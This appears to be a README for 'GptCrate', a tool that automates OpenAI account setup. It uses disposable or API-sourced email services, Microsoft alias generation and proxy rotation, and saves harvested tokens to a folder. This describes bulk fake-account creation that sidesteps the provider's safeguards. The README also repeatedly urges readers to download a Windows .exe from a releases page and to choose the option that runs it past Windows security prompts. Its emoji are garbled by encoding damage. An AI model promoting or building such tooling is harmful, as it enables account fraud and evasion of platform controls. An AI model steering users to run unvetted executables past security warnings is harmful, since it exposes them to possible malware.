GptCrate

๐Ÿš€ GptCrate - Simple OpenAI Account Setup

Download GptCrate

๐Ÿ“ฅ Download

  1. Open the GptCrate Releases page
  2. Download the latest Windows file from the release list
  3. Save the file to a folder you can find again, such as Downloads
  4. If the file comes as a .zip, extract it first
  5. If you see an .exe file, double-click it to start the app

๐ŸชŸ Run on Windows

  1. Download the file from the release page
  2. Open the folder where the file was saved
  3. If Windows shows a security prompt, choose the option that lets you run the file
  4. Start the app by double-clicking the main file
  5. Keep the app in the same folder with its other files

โš™๏ธ What GptCrate Does

GptCrate helps you run a tool that works with OpenAI account setup tasks. It supports:

The app includes these email source modes:

The easiest setup uses LuckMail.

You only need to enter an API key. The rest of the settings can stay as they are.

EMAIL_MODE=luckmail
LUCKMAIL_API_KEY=your_api_key
TOKEN_OUTPUT_DIR=./to

๐Ÿงฉ Before You Start

You will need:

๐Ÿ–ฅ๏ธ Main Ways to Use It

Terminal version

This is the main way to use the tool.

  1. Open the program from the downloaded files
  2. Follow the menu on screen
  3. Choose the task you want to run
  4. Enter the required values when asked

Web UI

The web UI is still being improved.

To open it:

python web_ui.py

It can help you:

๐Ÿ“ง Email Source Options

1. LuckMail

This is the default choice.

Use it when you want a simple setup with fewer steps.

2. CF

Use this if you want to manage email yourself or use a Cloudflare Worker setup.

3. local_outlook

Use this if you already have Outlook credentials saved on your computer.

4. hotmail007

Use this if you want to connect through the Hotmail007 API.

๐Ÿ”ค Microsoft Alias Generator

GptCrate also includes a Microsoft email alias tool.

You can start it in one of two ways:

  1. Run start.py and choose ๅพฎ่ฝฏ้‚ฎ็ฎฑๅคšๅˆซๅ็”Ÿๆˆๅ™จ
  2. Run alias_generator.py

It supports:

๐Ÿ› ๏ธ Basic Setup Steps

  1. Download the latest release from the Releases page
  2. Extract the files if needed
  3. Open the folder
  4. Edit the config file if you want to change email mode or API key
  5. Run the main file
  6. Follow the prompts on the screen

๐Ÿ“ Example Config

If you use LuckMail, your config can look like this:

EMAIL_MODE=luckmail
LUCKMAIL_API_KEY=your_api_key_here
TOKEN_OUTPUT_DIR=./to

If you use another email source, change the mode name to match it.

๐Ÿ“‚ Folder Layout

You may see files like these:

๐Ÿ” Proxy Use

The tool supports proxy rotation.

Use proxies when you want to route requests through different network paths.

A typical setup may include:

๐Ÿงญ Simple First Run

If you are new, use this path:

  1. Download the release
  2. Extract the files
  3. Set EMAIL_MODE=luckmail
  4. Add your LUCKMAIL_API_KEY
  5. Run the main program
  6. Choose the default option in the menu
  7. Check the output folder for results

๐Ÿงช Common File Types

You may see these file types after download:

๐Ÿ“Œ Best Use Path

If you want the fewest steps, use this order:

  1. Download the latest release
  2. Use LuckMail
  3. Start the main menu with start.py
  4. Follow the prompts
  5. Save results in the default output folder

๐Ÿ”— Download Again

If you need the file later, use the same page:

Go to GptCrate Releases

๐Ÿ–ฑ๏ธ What to Click

When you open the release page, look for:

๐Ÿ“ Output Files

The tool saves data to the folder set in:

TOKEN_OUTPUT_DIR=./to

You can change this path if you want the files in another folder.

๐Ÿงฐ Useful Shortcuts

Visit the GptCrate release download page